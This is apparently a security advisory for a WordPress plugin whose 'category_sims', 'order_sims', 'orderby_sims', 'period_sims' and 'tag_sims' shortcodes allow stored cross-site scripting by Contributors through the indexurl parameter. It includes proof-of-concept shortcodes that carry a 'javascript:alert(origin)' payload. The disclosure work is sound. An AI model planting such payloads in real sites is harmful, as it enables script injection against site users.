The plugin does not make sure that the indexurl parameter of the shortcodes “category_sims”, “order_sims”, “orderby_sims”, “period_sims”, and “tag_sims” use allowed URL protocols, which can lead to stored cross-site scripting by users with a role as low as Contributor
As a contributor, add one of the shortcode below to a post or page, then view it and change the state of the input/s generated (such as tick a checkbox, or select a different option etc) to trigger the XSS [category_sims type=“checkbox” indexurl=“javascript:alert(origin)//”] [order_sims indexurl=“javascript:alert(origin)//”] [orderby_sims indexurl=“javascript:alert(origin)//”] [period_sims indexurl=“javascript:alert(origin)//”] [tag_sims type=“checkbox” indexurl=“javascript:alert(origin)//”]